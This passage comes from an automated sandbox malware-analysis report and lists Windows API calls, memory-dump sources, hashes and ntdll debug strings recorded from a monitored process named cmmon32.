                                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0040838B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1836367815-0
                                                                                                  • Opcode ID: a6ae4c924720be0693f46a6fe1e8d3176060a1863f1c584981c537febf6ebbb0
                                                                                                  • Instruction ID: ed9df0ad3365d2002663fa5c40fef5dff36fce5f5ec99479e5a609c370036d9e
                                                                                                  • Opcode Fuzzy Hash: a6ae4c924720be0693f46a6fe1e8d3176060a1863f1c584981c537febf6ebbb0
                                                                                                  • Instruction Fuzzy Hash: 6901B531A8032877E721AA959D43FEF776C5B40F54F04012DFF04BA1C2EAA8690642EA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0040836A
                                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0040838B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1836367815-0
                                                                                                  • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                                                  • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                                                                  • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                                                  • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0041A734
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateInternalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2186235152-0
                                                                                                  • Opcode ID: f48e9605061ef95c130ae55c5b7c429d3ed6ccf99ee4371b4655849f4f4d4fa8
                                                                                                  • Instruction ID: fc901bcbcb5e177df8cee9a68dec8654dccb0d6a4974547854007943bc96071f
                                                                                                  • Opcode Fuzzy Hash: f48e9605061ef95c130ae55c5b7c429d3ed6ccf99ee4371b4655849f4f4d4fa8
                                                                                                  • Instruction Fuzzy Hash: 3C1107B2201208AFDB14DF99CC84EEB77A9EF8D764F158258BA0D97241C630E951CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0
                                                                                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                  • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                                                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                  • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0041A734
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateInternalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2186235152-0
                                                                                                  • Opcode ID: c13e45fee7b1a59ebeacea8eaec14764a2d5ba402b7909eda1d38e70c04186c7
                                                                                                  • Instruction ID: ab9373f17537bb0822c0630eda2fc626c3274feab2234124df9164f5bed6cb8e
                                                                                                  • Opcode Fuzzy Hash: c13e45fee7b1a59ebeacea8eaec14764a2d5ba402b7909eda1d38e70c04186c7
                                                                                                  • Instruction Fuzzy Hash: 7B01AFB2215108AFCB54DF89DC80EEB77ADAF8C754F158258FA0D97251D630E851CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0041A734
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateInternalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2186235152-0
                                                                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                  • Instruction ID: c0409bc591760e5b86b1b32807d612366400da8e17bcb8cc8f9e0bcd0fd11a44
                                                                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                  • Instruction Fuzzy Hash: C601B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040F050,?,?,00000000), ref: 004191EC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: a54d11b82f9491412a8726d74d522cee7080b709242b24c571322f1b65061c98
                                                                                                  • Instruction ID: eb7c2e9fd60943c498bc6ff8530c5537a6ac12267d17fee8e4adef21c215dba5
                                                                                                  • Opcode Fuzzy Hash: a54d11b82f9491412a8726d74d522cee7080b709242b24c571322f1b65061c98
                                                                                                  • Instruction Fuzzy Hash: ECE092773803043AE3306599AC03FE7B39CDB81B34F14002AFA0DEB2C1D999F84142A8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F1D2,0040F1D2,?,00000000,?,?), ref: 0041A800
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3899507212-0
                                                                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                  • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                  • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,00408D14,?), ref: 0040F6FB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2340568224-0
                                                                                                  • Opcode ID: 755afa4ffb5bb0d6c596bdb6fd38475aeb2c1e8456628ed37241fa372a659550
                                                                                                  • Instruction ID: e731fa677bc0404c6222ccbf1c0f572c64fd3d59592b1f35b9d8bd7759612df5
                                                                                                  • Opcode Fuzzy Hash: 755afa4ffb5bb0d6c596bdb6fd38475aeb2c1e8456628ed37241fa372a659550
                                                                                                  • Instruction Fuzzy Hash: 1BE0263464034026D310FB748C13F1277C8AF85B00F4E40B8F548976C3D454E0018210
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,00408D14,?), ref: 0040F6FB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2340568224-0
                                                                                                  • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                  • Instruction ID: 16dd6e19701eb8137eea147804aeefc1d225e4ea9fc13a12949d67fdd6a7e390
                                                                                                  • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                  • Instruction Fuzzy Hash: 71D05E756503082AE610AAA59C03F6632886B44B04F490074F948AA3C3D964E4014169
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 6a6a2f60dabd3f2bde2370e4968567ff7be60bf85314520d77d28fc1160b369c
                                                                                                  • Instruction ID: cad3eeea27c0b071825e3e42b366ee8192a6074e1da1a49e3bfed0bab7bb821c
                                                                                                  • Opcode Fuzzy Hash: 6a6a2f60dabd3f2bde2370e4968567ff7be60bf85314520d77d28fc1160b369c
                                                                                                  • Instruction Fuzzy Hash: FAB02B318024C0C5FF04F7204A087173900ABC0300F15D061D3030241E0338D0D0E171
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  • Opcode ID: 94aebeb65a99ab1fc2f0d2e1a5c2f83ed26af2e4162a2ef87470757539dd0106
                                                                                                  • Instruction ID: 1dbb177e1559a3218dc48d093fd9020369bd3f5ec1921f7f284e61772bd69e7d
                                                                                                  • Opcode Fuzzy Hash: 94aebeb65a99ab1fc2f0d2e1a5c2f83ed26af2e4162a2ef87470757539dd0106
                                                                                                  • Instruction Fuzzy Hash: DE51E8B6A05126BFDF24DF998C9097FF7BCBB08204714A16AF565D3681D234FE1187A0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  • Opcode ID: 9b9f3a07e6737343932873abd8541c33ef424cc149b75e584602b0552b7ab3f9
                                                                                                  • Instruction ID: dac0f62c19a411f252d49ebcc3bc40bc50021aac1b2379df09979ed8b8dea5bd
                                                                                                  • Opcode Fuzzy Hash: 9b9f3a07e6737343932873abd8541c33ef424cc149b75e584602b0552b7ab3f9
                                                                                                  • Instruction Fuzzy Hash: 0B51E3B5A04649ABDF34DE5CCD9087FB7F8AB48204B00849BE995D3652E6F4FA008F60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04414787
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04414725
                                                                                                  • Execute=1, xrefs: 04414713
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04414655
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04414742
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 044146FC
                                                                                                  • ExecuteOptions, xrefs: 044146A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  • API String ID: 0-484625025
                                                                                                  • Opcode ID: 6b51698c5508279e95e47f97a4012f20bb627584054fba9eda3c24b9df9a76fe
                                                                                                  • Instruction ID: cc9dcf81596c194bea371e55efb0dc722122f1dc956d5f8163bf04beeef97a4c
                                                                                                  • Opcode Fuzzy Hash: 6b51698c5508279e95e47f97a4012f20bb627584054fba9eda3c24b9df9a76fe
                                                                                                  • Instruction Fuzzy Hash: 2B5106326002197AFF20AAA5EC85BBA77B8EF08704F5414AAE505A71D1EB71BE458F50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                  • Instruction ID: 48898205a4d551203b6989e7b77ecca88814dffd0125601efe0bacc7f99e8197
                                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                  • Instruction Fuzzy Hash: D8024671608741AFDB04CF19C490AAFBBE6EFC8714F45892EF9854B260DB31E906CB52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: +$-$0$0
                                                                                                  • API String ID: 1302938615-699404926
                                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                  • Instruction ID: 60517030b2ed631f2ce7bbcaa83d98aae60d927ed82132ba1b32269fd122b470
                                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                  • Instruction Fuzzy Hash: 1B81D070E07269CAEF26CE6AC8517FEFBA1AF45310F18611AD861A77D0C730B841CB60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                  • API String ID: 48624451-2819853543
                                                                                                  • Opcode ID: 25997812c1da5fd9c4cdb0274dd71bf3e3f938feefda7cb5234d221e06581b78
                                                                                                  • Instruction ID: b7bcee62738b1a6a39504ff71a897c301c3e08caf4d316480a7dab46fca25330
                                                                                                  • Opcode Fuzzy Hash: 25997812c1da5fd9c4cdb0274dd71bf3e3f938feefda7cb5234d221e06581b78
                                                                                                  • Instruction Fuzzy Hash: 8A214FB6A00119ABDF14EEA9DC40ABFB7F8EF58645F040157ED05E3241EB70A9018BA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • RTL: Re-Waiting, xrefs: 0441031E
                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044102BD
                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044102E7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                  • API String ID: 0-2474120054
                                                                                                  • Opcode ID: 4101486b9680120fb3487e111e0bdd772f121362d5c73c115a183ac15f3ff782
                                                                                                  • Instruction ID: efdfdce6ee1c6d4a2c9af74b09469faef5bbf4aa19aabc89cd7dcfc775f96bc0
                                                                                                  • Opcode Fuzzy Hash: 4101486b9680120fb3487e111e0bdd772f121362d5c73c115a183ac15f3ff782
                                                                                                  • Instruction Fuzzy Hash: 73E1AE306047419FEB25CF28C884B2AB7E1AF88314F141A5EF5A58B6E1E775FD45CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • RTL: Resource at %p, xrefs: 04417B8E
                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04417B7F
                                                                                                  • RTL: Re-Waiting, xrefs: 04417BAC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 0-871070163
                                                                                                  • Opcode ID: e0573f3712c344585605fa120f5f5c0ad730642da0325ae3befb52bc0d65c1a1
                                                                                                  • Instruction ID: d34976552b9d4bd5d4808fcb411c3f8b971224855650a6724d0e37e37d9d17cc
                                                                                                  • Opcode Fuzzy Hash: e0573f3712c344585605fa120f5f5c0ad730642da0325ae3befb52bc0d65c1a1
                                                                                                  • Instruction Fuzzy Hash: 2F41D1327017029FDB24DE25E840B6BB7E9EF88724F101A1EF95A9B790DB31F4058B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0441728C
                                                                                                  Strings
                                                                                                  • RTL: Resource at %p, xrefs: 044172A3
                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04417294
                                                                                                  • RTL: Re-Waiting, xrefs: 044172C1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 885266447-605551621
                                                                                                  • Opcode ID: 1093238b42bc7bd8014f82fb8812cd13dadb81068cf0488ce0d8c2b2be2e5666
                                                                                                  • Instruction ID: c1ae3cd3ffe04fede361bf828f3f3187898615810558d5b1e7c15505ebe592b8
                                                                                                  • Opcode Fuzzy Hash: 1093238b42bc7bd8014f82fb8812cd13dadb81068cf0488ce0d8c2b2be2e5666
                                                                                                  • Instruction Fuzzy Hash: 8341F032700612ABDB20DE25DC41B6AF7A5FF44714F20061AF955AB790DB21F8069BD1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$]:%u
                                                                                                  • API String ID: 48624451-3050659472
                                                                                                  • Opcode ID: e510d0cfa9df3ed98f6654bedcf284be4c5f54d91cbba3405ae0190d82190521
                                                                                                  • Instruction ID: 79d8e4dfd4cca54e11d9597a5ca91675cfd56744479521a60168a5c81b5f6ec4
                                                                                                  • Opcode Fuzzy Hash: e510d0cfa9df3ed98f6654bedcf284be4c5f54d91cbba3405ae0190d82190521
                                                                                                  • Instruction Fuzzy Hash: D9313072A002299EDF64DE29DC40AAB77A8BF44614F444597EC49E3241EE70BA498FA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
